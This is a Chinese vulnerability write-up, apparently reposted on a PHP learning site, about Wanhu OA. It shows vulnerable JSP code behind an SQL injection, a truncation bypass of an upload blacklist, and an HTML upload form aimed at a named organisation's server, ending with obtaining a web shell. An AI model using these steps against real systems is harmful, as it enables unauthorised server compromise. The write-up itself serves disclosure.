网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

万户OA某处绕过限制文件上传以及sql注入 - 网站安

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 万户OA某处绕过限制文件上传以及sql注入发现这玩意还有标准版和专业版。不知道有没有和方便面牛重复~里面的方法适用于标准版,专业版存在同样的文件但是路径不一样。defaultroot i...

sql注入:
 
 万户OA某处无限制sql注入 :http://www.2cto.com/Article/201409/332916.html
 
里面的方法适用于标准版,专业版存在同样的文件但是路径不一样。
 
defaultroot\iWebRevision.jsp\DocumentEdit.jsp
 
 
if (ObjConnBean.OpenConnection()) {

  System.out.println("OpenConnection");

  String Sql="Select * From Document Where RecordID='"+ RecordID + "'";

  ResultSet rs = null;

  rs = ObjConnBean.ExecuteQuery(Sql);

 

 
专业版使用的数据库是oracle所以poc不能用了,直接上sqlmap吧。
 
这样两个版本都通杀了,不知道这系统为什么要一个文件到处放。
 
文件上传:(这漏洞两个版本都适用的)
 
defaultroot/dragpage/upload.jsp
 
 
代码里是有过滤,但是看通过截断绕过setAllowedFilesList方法的黑名单限制
 
// Initialization

mySmartUpload.initialize(pageContext);



//mySmartUpload.setTotalMaxFileSize(100000);

mySmartUpload.setAllowedFilesList("jpg,gif,bmp,swf,avi");

// Upload 

mySmartUpload.upload();

 

 
 
构造一个上传文件
 
<form id="frmUpload" enctype="multipart/form-data" action="http://oa.china-sss.com/defaultroot/dragpage/upload.jsp" method="post">

Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">FileUpload

</form>

 

 
然后抓包截断
 
 
 
shell到手~
 



自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论